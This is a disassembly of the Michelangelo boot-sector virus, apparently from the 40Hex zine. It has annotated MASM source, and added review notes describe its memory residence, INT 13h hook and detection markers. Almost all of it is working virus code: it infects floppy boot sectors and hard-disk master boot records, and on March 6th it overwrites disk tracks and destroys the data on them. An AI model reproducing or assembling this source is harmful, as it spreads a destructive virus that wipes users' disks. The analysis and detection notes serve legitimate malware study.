40Hex Number 8 Volume 2 Issue 4 File 006
;This is a disassembly of the much-hyped michelangelo virus.
;As you can see, it is a derivative of the Stoned virus. The
;junk bytes at the end of the file are probably throwbacks to
;the Stoned virus. In any case, it is yet another boot sector
;and partition table infector.
;
;-----------------------------------------------------------------------
; Analysis notes (added on review; the code below is unchanged)
;
; Syntax/target: MASM/TASM-style Intel syntax, 16-bit real mode, one
;   512-byte sector image assembled at org 0 and loaded by the BIOS at
;   0:7C00h.  `;` starts a comment.
;
; Layout of the image (all offsets relative to org 0):
;   0000h  jmp entervirus          3 bytes; together with the first byte
;   0003h  highmemjmp              of highmemjmp these 4 bytes are the
;                                  infection marker compared in
;                                  checkinfect / the HD check below
;   0007h  maxhead                 heads to cover in damagestuff (2 or 4)
;   0008h  firstsector             CX (cyl/sector) where the ORIGINAL
;                                  boot sector/MBR was stored: 3 (360K
;                                  floppy), 0Eh (other floppy), 7 (HD)
;   000Ah  oldint13h               saved INT 13h vector, filled at boot
;   000Eh  int13h                  resident INT 13h hook
;   ...    code
;   partitioninfo (42h = 66 bytes) tail of the HOST sector copied in at
;                                  infection time (partition table +
;                                  signature on an MBR)
;
; Boot-time behaviour (entervirus): saves the INT 13h vector, lowers the
;   BIOS base-memory count at 0040:0013 by 2 KB, copies the code part of
;   the image to the top of conventional memory, points INT 13h at the
;   copy, then reloads the original boot sector/MBR to 0:7C00h and
;   transfers to it with RETF.  On March 6th (any year; the RTC year is
;   never examined) it instead enters damagestuff.
;
; Resident behaviour (int13h): only INT 13h calls for drive 0 (DL=0)
;   issued while bit 0 of the BIOS diskette-motor-status byte
;   (0040:003F) is clear are intercepted; the original handler runs
;   first, then infectdisk is called.
;
; Detection-relevant observations visible in this listing: the INT 13h
;   vector points into the reserved top-of-memory segment; 0040:0013 is
;   2 KB below the machine's real value; sector 1 of an infected medium
;   starts with the 4 marker bytes above; the displaced original sector
;   sits at cyl 0 / head 1 / sector 3 or 14 (floppy) or cyl 0 / head 0 /
;   sector 7 (hard disk).
;-----------------------------------------------------------------------
michelangelo segment byte public
assume cs:michelangelo, ds:michelangelo
;Disassembly by Dark Angel of PHALCON/SKISM
org 0
        jmp     entervirus
highmemjmp db 0F5h, 00h, 80h, 9Fh     ;far pointer used by the jump to high
                                      ;memory: offset 00F5h, segment 9F80h.
                                      ;The segment word is overwritten at boot
                                      ;(entervirus); the static 9F80h equals
                                      ;640 KB - 2 KB in paragraphs.
maxhead db 2                          ;used by damagestuff (2 heads for a
                                      ;floppy, set to 4 for a hard disk)
firstsector dw 3                      ;cyl/sector of the displaced original
                                      ;sector; rewritten on every infection
oldint13h dd 0C8000256h               ;original INT 13h vector, stored here
                                      ;by entervirus; the initial value is
                                      ;presumably a leftover from the
                                      ;authoring system - never used as-is

;-----------------------------------------------------------------------
; int13h - resident INT 13h hook
; In:   DL = drive, other registers as for BIOS INT 13h
; Out:  whatever the original handler returns; flags from the original
;       handler are the ones the caller sees (see retf 2 below)
; Only DL=0 with the A: motor-status bit clear is intercepted.
;-----------------------------------------------------------------------
int13h:
        push    ds
        push    ax
        or      dl, dl                ;default drive? (DL=0 -> drive A:)
        jnz     exitint13h            ;exit if not
        xor     ax, ax
        mov     ds, ax
        test    byte ptr ds:[43fh], 1 ;0040:003F = diskette motor status;
                                      ;bit 0 = drive A motor running
        jnz     exitint13h            ;NOTE(review): the original comment
                                      ;("if not spinning, exit") is inverted
                                      ;relative to this jnz: the hook exits
                                      ;when the motor IS already on and only
                                      ;intercepts when the bit is clear
        pop     ax
        pop     ds
        pushf
        call    dword ptr cs:[oldint13h];first call old int 13h (pushf+far
                                      ;call emulates an INT; the handler's
                                      ;IRET pops the pushed flags)
        pushf                         ;keep the original handler's flags
        call    infectdisk            ;then infect
        popf                          ;restore them (CF = BIOS result)
        retf    2                     ;return to the INT caller, discarding
                                      ;the caller's pushed flags so the live
                                      ;flags above are what it observes
exitint13h:
        pop     ax
        pop     ds
        jmp     dword ptr cs:[oldint13h] ;pass straight through

;-----------------------------------------------------------------------
; infectdisk - infect the floppy in drive 0 (called from int13h)
; In:   CS = resident segment.  Reads boot sector to CS:200h, up to 4
;       attempts with a reset between them.
; Out:  nothing; all registers preserved (push/pop frame below)
; Uses the saved vector directly (pushf/call oldint13h) so the calls do
; not re-enter the hook.
;-----------------------------------------------------------------------
infectdisk:
        push    ax
        push    bx
        push    cx
        push    dx
        push    ds
        push    es
        push    si
        push    di
        push    cs
        pop     ds
        push    cs
        pop     es
        mov     si, 4                 ;SI = read attempts remaining
readbootblock:
        mov     ax,201h               ;Read boot block (AH=2, 1 sector) to
        mov     bx,200h               ;CS:200h, i.e. just after the 512-byte
                                      ;virus image
        mov     cx,1                  ;cyl 0, sector 1
        xor     dx,dx                 ;head 0, drive 0
        pushf
        call    oldint13h
        jnc     checkinfect           ;continue if no error
        xor     ax,ax
        pushf
        call    oldint13h             ;Reset disk (AH=0)
        dec     si                    ;loop back
        jnz     readbootblock
        jmp     short quitinfect      ;exit if too many failures
checkinfect:
        xor     si,si                 ;SI -> offset 0 of the virus image
        cld
        lodsw                         ;AX = first word of virus image
        cmp     ax,[bx]               ;check if already infected: compare
                                      ;with first word of the read sector
        jne     infectitnow
        lodsw                         ;AX = second word (bytes 2-3)
        cmp     ax,[bx+2]             ;check again
        je      quitinfect            ;4-byte marker matches -> infected
infectitnow:
        mov     ax,301h               ;Write old boot block (AH=3, 1 sector,
                                      ;still at ES:BX = CS:200h)
        mov     dh,1                  ;to head 1
        mov     cl,3                  ;sector 3 (cyl 0)
        cmp     byte ptr [bx+15h],0FDh ;360k disk? [bx+15h] is the BPB media
                                      ;descriptor byte of the read sector;
                                      ;0FDh = 360 KB 5.25"
        je      is360Kdisk
        mov     cl,0Eh                ;otherwise sector 14 - no check here
                                      ;that the medium has that many sectors
                                      ;per track
is360Kdisk:
        mov     firstsector,cx        ;remember where the original went
        pushf
        call    oldint13h
        jc      quitinfect            ;exit on error
        mov     si,200h+offset partitioninfo
        mov     di,offset partitioninfo
        mov     cx,21h                ;Copy partition table: 21h words =
                                      ;66 bytes from the tail of the host
                                      ;sector into the virus image
        cld
        rep     movsw                 ;leaves CX = 0
        mov     ax,301h               ;Write virus to sector 1
        xor     bx,bx                 ;ES:BX = CS:0 = virus image
        mov     cx,1                  ;cyl 0, sector 1
        xor     dx,dx                 ;head 0, drive 0
        pushf
        call    oldint13h
quitinfect:
        pop     di
        pop     si
        pop     es
        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        retn                          ;near return to int13h

;-----------------------------------------------------------------------
; entervirus - boot-sector entry point (BIOS jumps to 0:7C00h)
; Sets SS:SP = 0:7C00h, saves the INT 13h vector, reserves 2 KB at the
; top of conventional memory via 0040:0013, copies the code portion of
; the image there, hooks INT 13h and jumps to the copy.
;-----------------------------------------------------------------------
entervirus:
        xor     ax,ax
        mov     ds,ax
        mov     ss,ax
        mov     ax,7C00h              ;Set stack to just below
        mov     sp,ax                 ;virus load point
        sti
        push    ds                    ;save 0:7C00h on stack for
        push    ax                    ;later retf
        mov     ax,ds:[13h*4]         ;IVT entry 13h, offset word
        mov     word ptr ds:[7C00h+offset oldint13h],ax
        mov     ax,ds:[13h*4+2]       ;IVT entry 13h, segment word
        mov     word ptr ds:[7C00h+offset oldint13h+2],ax
        mov     ax,ds:[413h]          ;0040:0013 = base memory size in KB
        dec     ax                    ;reserve 2 KB at the top of
        dec     ax                    ;conventional memory for the virus
        mov     ds:[413h],ax          ;move new value in
        mov     cl,6
        shl     ax,cl                 ;ax = paragraphs of memory (KB * 64)
        mov     es,ax                 ;ES = destination segment; next line
                                      ;patches the segment word of highmemjmp
        mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
        mov     ax,offset int13h
        mov     ds:[13h*4],ax         ;point INT 13h at the resident copy
        mov     ds:[13h*4+2],es
        mov     cx,offset partitioninfo ;copy only the code part (everything
                                      ;before partitioninfo)
        mov     si,7C00h
        xor     di,di
        cld
        rep     movsb                 ;copy to high memory
                                      ;and transfer control there
        jmp     dword ptr cs:[7C00h+offset highmemjmp]
;destination of highmem jmp - from here on CS = top-of-memory segment and
;INT 13h already goes through the hook above (DL<>0 passes through)
        xor     ax,ax
        mov     es,ax
        int     13h                   ;reset disk (AH=0; DL as left by BIOS)
        push    cs
        pop     ds
        mov     ax,201h               ;read 1 sector
        mov     bx,7C00h              ;to ES:BX = 0:7C00h
        mov     cx,firstsector        ;where the original sector was stored
        cmp     cx,7                  ;hard disk infection?
        jne     floppyboot            ;if not, do floppies
        mov     dx,80h                ;Read old partition table of
        int     13h                   ;first hard disk (cyl 0/head 0/sector
                                      ;7) to 0:7C00h
        jmp     short exitvirus
floppyboot:
        mov     cx,firstsector        ;read old boot block (redundant reload)
        mov     dx,100h               ;head 1, drive 0, to 0:7C00h
        int     13h
        jc      exitvirus
        push    cs
        pop     es
        mov     ax,201h               ;read boot block (MBR)
        mov     bx,200h               ;of first hard disk to CS:200h
        mov     cx,1
        mov     dx,80h
        int     13h
        jc      exitvirus
        xor     si,si
        cld
        lodsw
        cmp     ax,[bx]               ;is it infected? (same 4-byte marker
                                      ;test as checkinfect)
        jne     infectharddisk        ;if not, infect HD
        lodsw                         ;check infection
        cmp     ax,[bx+2]
        jne     infectharddisk
exitvirus:
        xor     cx,cx                 ;Real time clock get date (INT 1Ah/AH=4)
        mov     ah,4                  ;dx = mon/day (BCD); CX is not examined
        int     1Ah                   ;CF (no clock) is not checked either
        cmp     dx,306h               ;March 6th - no year comparison
        je      damagestuff
        retf                          ;return control to original
                                      ;boot block @ 0:7C00h (pushed at entry)

;-----------------------------------------------------------------------
; damagestuff - March 6th payload
; Overwrites tracks starting at cyl 0 / head 0 / sector 1 with the
; contents of memory at 5000h:5000h.  Drive, heads and sectors per
; track are chosen from firstsector: 3 -> drive 0, 2 heads, 9 sectors;
; 0Eh -> drive 0, 2 heads, 14 sectors; otherwise drive 80h, 4 heads,
; 17 sectors.  The loop has no exit: CH (low 8 bits of the cylinder)
; wraps after 255 and the sweep restarts; the high cylinder bits in CL
; are never advanced.  Calls with DL=0 pass through the int13h hook.
;-----------------------------------------------------------------------
damagestuff:
        xor     dx,dx                 ;drive 0, head 0
        mov     cx,1                  ;cyl 0, sector 1
smashanothersector:
        mov     ax,309h               ;AH=3 write, AL=9 sectors
        mov     si,firstsector
        cmp     si,3
        je      smashit               ;360K floppy: 9 sectors/track
        mov     al,0Eh                ;14 sectors
        cmp     si,0Eh
        je      smashit               ;other floppy
        mov     dl,80h                ;first hard disk
        mov     maxhead,4
        mov     al,11h                ;17 sectors/track
smashit:
        mov     bx,5000h              ;random memory area
        mov     es,bx                 ;at 5000h:5000h
        int     13h                   ;Write al sectors to drive dl
        jnc     skiponerror           ;skip on error
        xor     ah,ah                 ;Reset disk drive dl
        int     13h
skiponerror:
        inc     dh                    ;next head
        cmp     dh,maxhead            ;2 if floppy, 4 if HD
        jb      smashanothersector
        xor     dh,dh                 ;go to next head/cylinder
        inc     ch                    ;8-bit: wraps, never terminates
        jmp     short smashanothersector

;-----------------------------------------------------------------------
; infectharddisk - reached from floppyboot when the HD MBR (read to
; CS:200h) lacks the marker.  Stores the original MBR at cyl 0 / head 0
; / sector 7, copies its last 66 bytes into the image, writes the image
; to sector 1.  ES:BX = CS:200h on entry (from floppyboot).
;-----------------------------------------------------------------------
infectharddisk:
        mov     cx,7                  ;Write original MBR to
        mov     firstsector,cx        ;sector 7 (cyl 0); remember it
        mov     ax,301h
        mov     dx,80h                ;head 0, first hard disk
        int     13h
        jc      exitvirus
        mov     si,200h+offset partitioninfo ;Copy partition
        mov     di,offset partitioninfo ;table information (66 bytes)
        mov     cx,21h
        rep     movsw                 ;leaves CX = 0
        mov     ax,301h               ;NOTE(review): the original "Write to
                                      ;sector 8" comment is wrong - rep movsw
                                      ;above zeroed CX, so inc cl below gives
                                      ;CX = 1, i.e. cyl 0 sector 1 (the MBR)
        xor     bx,bx                 ;Copy virus (CS:0) to sector 1
        inc     cl                    ;CX = 0001h, not 0008h
        int     13h                   ;no error check; execution falls into
                                      ;the bytes below
;* jmp short 01E0h
        db      0EBh, 32h             ;?This should crash? - as laid out here
                                      ;the short-jump target 01E0h lies inside
                                      ;partitioninfo; this listing does not
                                      ;settle what happens on that path
;The following bytes are meaningless.
garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo: db 42h dup (0)         ;66-byte tail copied from the host
                                      ;sector at infection time
michelangelo ends
end